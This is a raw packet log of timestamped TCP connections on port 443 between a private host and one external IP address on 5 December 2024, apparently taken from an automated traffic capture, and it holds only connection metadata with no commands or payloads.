                                                Dec 5, 2024 08:24:09.108932018 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.108954906 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.109034061 CET49839443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.109074116 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.109123945 CET49839443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.215804100 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.215897083 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.215897083 CET49839443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.215939045 CET49839443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.239134073 CET49839443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.239168882 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.271054983 CET49847443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.271095991 CET44349847164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.271289110 CET49847443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.271821976 CET49847443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.271835089 CET44349847164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.293654919 CET49848443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.293683052 CET44349848164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.293752909 CET49848443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.294003010 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.294039965 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.294102907 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.294249058 CET49848443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.294264078 CET44349848164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.294495106 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.294512987 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.294759989 CET49850443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.294770956 CET44349850164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.294840097 CET49850443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.295177937 CET49850443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.295190096 CET44349850164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.496164083 CET49851443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.496189117 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.496284962 CET49851443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.496588945 CET49851443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.496603012 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.655761957 CET44349847164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.656167984 CET49847443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:10.656198025 CET44349847164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.656538963 CET44349847164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.656889915 CET49847443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:10.656955957 CET44349847164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.657186985 CET49847443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:10.681961060 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.682281017 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:10.682301044 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.682574034 CET44349850164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.682749987 CET49850443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:10.682773113 CET44349850164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.683181047 CET44349848164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.683370113 CET49848443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:10.683378935 CET44349848164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.683418036 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.683492899 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:10.683743954 CET44349848164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.683842897 CET44349850164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.683870077 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:10.683912039 CET49850443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:10.683937073 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.684180021 CET49848443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:10.684250116 CET44349848164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.684478998 CET49850443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:10.684545994 CET44349850164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.684597969 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:10.684608936 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.684674025 CET49848443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:10.703335047 CET44349847164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.724448919 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:10.724453926 CET49850443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:10.724466085 CET44349850164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.727339983 CET44349848164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.770406008 CET49850443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:10.875286102 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.875694036 CET49851443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:10.875715971 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.876775026 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.876866102 CET49851443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:10.877238035 CET49851443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:10.877305984 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.877392054 CET49851443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:10.877402067 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:10.921384096 CET49851443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:11.607702017 CET44349847164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:11.607789993 CET44349847164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:11.607907057 CET49847443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:11.608048916 CET49847443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:11.608064890 CET44349847164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:11.626231909 CET44349848164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:11.626313925 CET44349848164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:11.626377106 CET49848443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:11.629162073 CET49848443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:11.629180908 CET44349848164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:11.823926926 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:11.823966980 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:11.824011087 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:11.824095964 CET49851443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:11.824117899 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:11.824172020 CET49851443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:11.905693054 CET49858443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:11.905747890 CET44349858164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:11.905833960 CET49858443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:11.931796074 CET49858443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:11.931824923 CET44349858164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.031085014 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.031099081 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.031125069 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.031284094 CET49851443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.031306028 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.031327009 CET49851443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.031358957 CET49851443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.086488008 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.086508989 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.086584091 CET49851443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.086605072 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.086652040 CET49851443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.209338903 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.209439993 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.209458113 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.209476948 CET49851443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.209520102 CET49851443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.209964037 CET49851443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.209985971 CET44349851164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.324770927 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.324799061 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.324805975 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.324820042 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.324845076 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.324883938 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.324901104 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.324960947 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.324975967 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.358957052 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.359009981 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.359069109 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.359081030 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.359117031 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.359143972 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.412183046 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.412209988 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.412260056 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.412275076 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.412339926 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.412341118 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.536825895 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.536863089 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.536915064 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.536931992 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.536983967 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.536983967 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.541234016 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.541281939 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.541304111 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.541327000 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.541398048 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.541695118 CET49849443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.541713953 CET44349849164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.582669973 CET49861443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.582707882 CET44349861164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.582789898 CET49861443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.583534002 CET49862443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.583576918 CET44349862164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.583631039 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.583645105 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.583694935 CET49862443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.583707094 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.586245060 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.586260080 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.586721897 CET49862443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.586734056 CET44349862164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:12.586873055 CET49861443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:12.586898088 CET44349861164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:13.312117100 CET44349858164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:13.312500954 CET49858443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:13.312525034 CET44349858164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:13.313559055 CET44349858164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:13.313636065 CET49858443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:13.314759016 CET49858443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:13.314824104 CET44349858164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:13.315018892 CET49858443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:13.315026045 CET44349858164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:13.363981962 CET49858443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:13.967169046 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:13.967869997 CET44349862164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:13.968230009 CET49862443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:13.968241930 CET44349862164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:13.968364000 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:13.968379021 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:13.969269037 CET44349862164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:13.969340086 CET49862443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:13.969388962 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:13.969455957 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:13.970463991 CET49862443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:13.970539093 CET44349862164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:13.970613003 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:13.970678091 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:13.970788002 CET49862443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:13.970797062 CET44349862164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:13.970823050 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:13.970829964 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:13.971442938 CET44349861164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:13.971646070 CET49861443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:13.971657991 CET44349861164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:13.972661018 CET44349861164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:13.972738981 CET49861443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:13.973062038 CET49861443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:13.973119974 CET44349861164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:13.973311901 CET49861443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:14.010312080 CET49862443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:14.019334078 CET44349861164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:14.027538061 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:14.029433966 CET49861443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:14.029445887 CET44349861164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:14.088094950 CET49861443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:14.189526081 CET44349858164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:14.189954996 CET44349858164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:14.190049887 CET49858443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:14.190401077 CET49858443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:14.190428019 CET44349858164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:14.191488028 CET49869443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:14.191524029 CET44349869164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:14.191654921 CET49869443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:14.194598913 CET49869443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:14.194617033 CET44349869164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.013180017 CET44349861164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.013205051 CET44349861164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.013215065 CET44349861164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.013252974 CET44349861164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.013273954 CET44349861164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.013278008 CET44349861164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.013297081 CET49861443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.013317108 CET44349861164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.013344049 CET49861443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.013359070 CET44349861164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.013367891 CET44349861164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.013370037 CET49861443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.013413906 CET49861443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.015759945 CET49861443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.015774965 CET44349861164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.032479048 CET44349862164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.032509089 CET44349862164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.032516956 CET44349862164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.032563925 CET44349862164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.032582998 CET49862443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.032598019 CET44349862164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.032608986 CET44349862164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.032628059 CET49862443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.032650948 CET49862443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.044461012 CET44349862164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.044540882 CET44349862164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.044548035 CET49862443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.044584990 CET49862443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.044961929 CET49862443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.044975996 CET44349862164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.160418034 CET49874443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.160459042 CET44349874164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.160546064 CET49874443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.161236048 CET49874443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.161248922 CET44349874164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.280277014 CET49875443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.280328989 CET44349875164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.280400991 CET49875443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.280694008 CET49875443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.280706882 CET44349875164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.523550987 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.523576975 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.523583889 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.523629904 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.523649931 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.523663998 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.523708105 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.523720026 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.523758888 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.565906048 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.573975086 CET44349869164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.574381113 CET49869443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.574418068 CET44349869164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.574769020 CET44349869164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.575160980 CET49869443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.575232983 CET44349869164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.575326920 CET49869443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.619347095 CET44349869164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.633198977 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.633209944 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.633259058 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.633292913 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.633486986 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.633486986 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.633497000 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.635329008 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.682492971 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.682517052 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.682636023 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.682646990 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.682704926 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.812542915 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.812567949 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.812711954 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.812726021 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.812792063 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.841049910 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.841074944 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.841186047 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.841207027 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.841255903 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.865530968 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.865549088 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.865628004 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.865638018 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.865689993 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.979182005 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.979208946 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.979377985 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.979389906 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.981322050 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.994038105 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.994086981 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.994119883 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:15.994169950 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.994245052 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.994808912 CET49863443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:15.994827986 CET44349863164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:16.012495041 CET49877443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.012531042 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:16.012636900 CET49877443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.012857914 CET49877443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.012871981 CET44349877164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:16.015034914 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.015099049 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:16.017508030 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.017729998 CET49878443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.017755032 CET44349878164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:16.027576923 CET49879443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.027607918 CET44349879164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:16.027700901 CET49879443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.028728008 CET49879443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.028745890 CET44349879164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:16.487811089 CET44349869164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:16.487900019 CET44349869164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:16.487972975 CET49869443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.488492966 CET49869443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.488512039 CET44349869164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:16.542941093 CET44349874164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:16.545099020 CET49874443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.545118093 CET44349874164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:16.546180010 CET44349874164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:16.546258926 CET49874443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.546673059 CET49874443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:16.546735048 CET44349874164.92.191.86192.168.2.5
